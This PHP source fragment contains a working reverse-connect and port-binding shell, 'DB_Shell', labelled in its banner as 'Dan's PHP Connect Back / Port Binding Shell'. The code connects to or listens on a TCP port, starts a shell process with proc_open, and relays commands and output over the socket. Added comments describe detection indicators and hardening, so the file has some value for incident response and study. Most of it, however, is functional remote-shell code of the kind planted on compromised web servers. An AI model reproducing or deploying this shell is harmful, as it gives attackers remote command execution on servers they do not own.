    if (($ret = socket_bind($sock, $address, $port)) < 0) {
        echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
        return(-2);
    }
    if (($ret = socket_listen($sock, 5)) < 0) {
        echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
        return(-3);
    }
    return($sock);
}
|
|
|
|
######################################################################
|
|
# Dan's PHP Connect Back / Port Binding Shell!
|
|
# Yes, that's right: a REAL shell!
|
|
# Now I had this idea for ages, finally coded it 6 months ago, and
|
|
# it's never really been used.
|
|
# Not really brain science but when there are many examples of PHP
|
|
# sockets + proc_open it's a little harder.
|
|
######################################################################
|
|
|
|
# Interactive shell bridged to a TCP socket.
# $type "cb": connect out to $host:$port (requires $host != "0.0.0.0");
# "pb": listen on $host:$port and accept a single connection. $shell is the
# command line handed to proc_open(); its stdin/stdout/stderr become pipes,
# and the loop relays socket input to the child's stdin and the child's
# stdout/stderr back to the socket until a read fails or a select() errors.
# For detection / incident response: set_time_limit(9000) lifts the
# execution limit to 9000 s, so one web-server worker stays busy for the
# session; while active that worker has a child process ($shell) attached
# via pipes and either an outbound connection to $host:$port or a listening
# socket on $port. Both select() calls use a 0 timeout, so the loop polls
# continuously without blocking (CPU-visible). proc_open() is the enabling
# primitive; disable_functions is the usual hardening control for it.
# Returns an error string on setup failure; on a normal loop exit it
# returns nothing and neither the child process nor the socket is closed
# explicitly.
function DB_Shell($type, $shell, $port, $host = "0.0.0.0") {
    if($type == "cb" && $host != "0.0.0.0") {
        $procsock = DB_NET_CONNECT($host, $port, "tcp");
    } elseif ($type == "pb") {
        $lsock = DB_NET_LISTEN($host, $port);
        # socket_accept() returns false on failure, so "< 0" never fires
        if (($procsock = socket_accept($lsock)) < 0) {
            return "socket_accept() failed: reason: " . socket_strerror($procsock) . "\n";
        }
    } else {
        return "Error no connection details specified!";
    }
    set_time_limit(9000);
    # child's stdin is readable by it (we write), stdout/stderr we read
    $descriptorspec = array(
        0 => array("pipe", "r"),
        1 => array("pipe", "w"),
        2 => array("pipe", "w")
    );
    $process = proc_open($shell, $descriptorspec, $pipes);
    if (is_resource($process)) {
        $tmp_loop = 1;
        do {
            # socket -> child stdin
            $tmp_array = array($procsock);
            $num_changed_sockets = socket_select($tmp_array, $write = NULL, $except = NULL, 0);
            if ($num_changed_sockets === false) {
                $tmp_loop = 0;
            } else if ($num_changed_sockets > 0) {
                foreach($tmp_array as $k => $v) {
                    if($v == $procsock) {
                        if(socket_last_error($procsock) > 0) $tmp_loop = 0;
                        # a failed read ends the session; $buf is forwarded regardless
                        if($tmp_loop == 1 && false == ($buf = socket_read($procsock, 2048, PHP_NORMAL_READ))) $tmp_loop = 0;
                        fwrite($pipes[0], $buf);
                    }
                }
            }
            # child stdout/stderr -> socket
            $tmp_arrayS = array($pipes[1], $pipes[2]);
            $num_changed_streams = stream_select($tmp_arrayS, $write = NULL, $except = NULL, 0);
            if ($num_changed_streams === FALSE) {
                $tmp_loop = 0;
            } else if ($num_changed_streams > 0) {
                foreach($tmp_arrayS as $k => $v) {
                    if($tmp_loop == 1 && false == ($buf = fread($v, 2048))) $tmp_loop = 0;
                    socket_write($procsock, $buf, strlen($buf));
                }
            }
        } while($tmp_loop == 1);
    } else {
        return "Error executing shell " . $shell;
    }
}
|
|
|
|
?>
|